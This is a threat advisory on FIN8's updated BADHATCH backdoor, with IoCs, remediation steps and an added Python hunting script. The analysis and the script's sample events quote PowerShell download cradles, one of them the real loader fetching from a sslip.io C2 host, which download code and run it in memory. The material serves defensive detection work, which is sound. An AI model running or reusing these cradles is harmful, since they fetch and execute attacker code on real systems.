
Rewterz Threat Alert – FIN8 Returns With Improved BADHATCH Toolkit

Severity

High

Analysis Summary

FIN8 first appeared in 2016 and is known for taking long breaks between campaigns to refine its TTPs. The group has used a diverse array of techniques, from spear-phishing to zero-day exploits in Windows, to infect retail, hospitality and entertainment companies and steal payment card data from POS systems. BADHATCH is a mature, highly capable backdoor that uses several evasion and defense techniques. The updated version also attempts to evade security monitoring by using TLS encryption to conceal the PowerShell commands it downloads and runs.

Attack Analysis

The observed loader is launched with the command line “powershell.exe -nop $pa='sys';iex (New-Object System.Net.WebClient).DownloadString('https://192-129-189-73[.]sslip[.]io/yo')” (defanged). The -nop switch skips the PowerShell profile, and the downloaded script is passed straight to Invoke-Expression (iex), so the second-stage code runs in memory without being written to disk. The hostname abuses sslip.io, a legitimate and widely used DNS service that resolves any name of the form a-b-c-d.sslip.io to the IP address a.b.c.d; because the name resolves publicly, an operator can obtain a valid TLS certificate for a server that has no registered domain. The malware uses this so that its download and C2 traffic is encrypted and carries a plausible-looking hostname rather than a bare IP, in an attempt to evade detection.


Impact

  • Financial loss
  • Theft of payment card data from POS systems
  • Exposure of sensitive data

Indicators of Compromise

IP

  • 198[.]46[.]140[.]52
  • 192[.]129[.]189[.]73

MD5

  • f12f70c4756826105d693af27bb10627
  • e73c4185f9712671c683f28fbddd1cca
  • bf7fcef0f51a7fe6d00752b8cdf25762
  • 5b638fde02fb7bf18ff68e9d99bd8de0
  • 39145f3e1ac2d74d19cb4137ee3db000

SHA-256

  • dbb3a665f9460343eb7625f8625815179e63aaa83f91b9283a296142ec4b2bbb
  • c328b3714df8400f4d4c071edb1f6d3b82d42488ebf8d9437c300bec9108755b
  • 981ecfc67d7192f0e82f3f8042d7c26c78396a3a62e5e34c717db31aee566eca
  • 428cf5d05d9c3d4f7601ff785a175c1d86a90fe060a1f33976b363e8f9530a88
  • 355d200eebf9d9102d5f2ba0c8a576948aef43640ae8f0eedf101e0e881be0b0

SHA1

  • 79e5ac6f2a517ab7fa0e2bd0103ea0c14958e8e9
  • 75fc0ce25767c0366b9c330de99f077620bb7c37
  • 5d97e581853be9a8ca94a3b09d9f75f4ce99ef56
  • 6c21e2aef9f3441786920acc6aa7bfddb240b2a6
  • f229183304a5a1308b844a06b2b618cdd5518111

URL

  • https[:]//192-129-189-73[.]sslip[.]io/yo
  • https[:]//192-129-189-73[.]sslip[.]io/80
  • https[:]//198-46-140-52[.]sslip[.]io/xxx

Remediation

  • Segment the POS network from the networks used by employees or guests.
  • Block the IPs, URLs and file hashes listed above at your respective controls (firewall, web proxy, endpoint protection).
  • Search your environment for the indicators above, including PowerShell process command lines that fetch scripts from sslip.io hostnames.
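The following detection script is an added example written for this alert; it is not code from Rewterz, from FIN8 or from the BADHATCH toolkit. It covers the attack analysis above and the last remediation step: it scans process-creation records for the PowerShell download-cradle syntax quoted in the analysis, decodes sslip.io hostnames (both the dashed 192-129-189-73.sslip.io form and the dotted 192.129.189.73.sslip.io form) back to the IP they resolve to, and matches the result against the IP indicators listed in this alert. The event records, field names and the non-IoC addresses 10.0.0.5 and 10.1.2.3 are constructed for the example; the two IoC IPs are the ones from the alert.

```python
"""Hunt for the BADHATCH PowerShell download cradle and sslip.io abuse.

Added example, not part of the Rewterz advisory. Input events are constructed
to resemble Sysmon Event ID 1 / Windows 4688 process-creation records, reduced
to the fields the logic needs.
"""
import ipaddress
import re

# Network indicators from this advisory (defanged on the page, plain here).
IOC_IPS = {"198.46.140.52", "192.129.189.73"}

# PowerShell download cradle: iex / Invoke-Expression over WebClient.DownloadString,
# tolerant of the "System." prefix and of whitespace around ")" and ".".
CRADLE_RE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*?new-object\s+(?:system\.)?net\.webclient\s*\)"
    r"\s*\.\s*downloadstring",
    re.IGNORECASE | re.DOTALL,
)

# Any http(s) URL; the host is everything before the first "/" (and any ":port").
URL_RE = re.compile(r"https?://([^\s'\"()]+)", re.IGNORECASE)

# sslip.io embeds the target IP in the hostname, dashed or dotted.
SSLIP_RE = re.compile(r"^((?:\d{1,3}[-.]){3}\d{1,3})\.sslip\.io$", re.IGNORECASE)


def sslip_embedded_ip(host):
    """Return the IPv4 address an sslip.io hostname resolves to, or None."""
    m = SSLIP_RE.match(host)
    if not m:
        return None
    try:
        return str(ipaddress.IPv4Address(m.group(1).replace("-", ".")))
    except ipaddress.AddressValueError:
        return None  # e.g. 999-1-1-1.sslip.io: looks like the pattern, not a valid IP


def host_to_ip(host):
    """Literal IPv4 hosts map to themselves; sslip.io hosts to the embedded IP."""
    embedded = sslip_embedded_ip(host)
    if embedded:
        return embedded
    try:
        return str(ipaddress.IPv4Address(host))
    except ipaddress.AddressValueError:
        return None  # ordinary DNS name; resolution is out of scope here


def analyze_command_line(cmdline):
    """Flag cradle syntax, sslip.io hosts and IoC hits in one command line."""
    hosts = [u.split("/", 1)[0].split(":", 1)[0].lower() for u in URL_RE.findall(cmdline)]
    ips = {ip for ip in (host_to_ip(h) for h in hosts) if ip}
    return {
        "download_cradle": bool(CRADLE_RE.search(cmdline)),
        "sslip_hosts": [h for h in hosts if sslip_embedded_ip(h)],
        "contacted_ips": sorted(ips),
        "ioc_hits": sorted(ips & IOC_IPS),
    }


def severity(findings):
    """Rank a finding; sslip.io alone is legitimate enough to only warrant review."""
    if findings["ioc_hits"]:
        return "high"  # known BADHATCH infrastructure from this advisory
    if findings["download_cradle"] and findings["sslip_hosts"]:
        return "high"  # same tradecraft, infrastructure not yet on the IoC list
    if findings["download_cradle"]:
        return "medium"
    if findings["sslip_hosts"]:
        return "low"
    return "none"


def scan_events(events):
    """Return (record_id, severity, findings) for every event worth a look."""
    alerts = []
    for ev in events:
        findings = analyze_command_line(ev["command_line"])
        sev = severity(findings)
        if sev != "none":
            alerts.append((ev["record_id"], sev, findings))
    return alerts


# Constructed sample records: record 1 is the command line quoted in the alert.
SAMPLE_EVENTS = [
    {"record_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop $pa='sys';iex (New-Object System.Net.WebClient)"
                     ".DownloadString('https://192-129-189-73.sslip.io/yo')"},
    {"record_id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Service -Name winrm"},
    {"record_id": 3, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -nop -w hidden iex (New-Object Net.WebClient)"
                     ".DownloadString('https://10.0.0.5/setup.ps1')"},
    {"record_id": 4, "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl.exe https://10.1.2.3.sslip.io/healthz"},
]

if __name__ == "__main__":
    for record_id, sev, findings in scan_events(SAMPLE_EVENTS):
        print(record_id, sev, findings)
```

Run against real data by feeding it the CommandLine field of Sysmon Event ID 1 or Security 4688 records. The cradle regex is deliberately narrow to the WebClient.DownloadString form shown in the alert; loaders using Invoke-WebRequest, encoded commands or a different host process need their own patterns, and a hit on an unknown sslip.io address should be treated as a lead to investigate rather than a confirmed infection, since the service has many legitimate users.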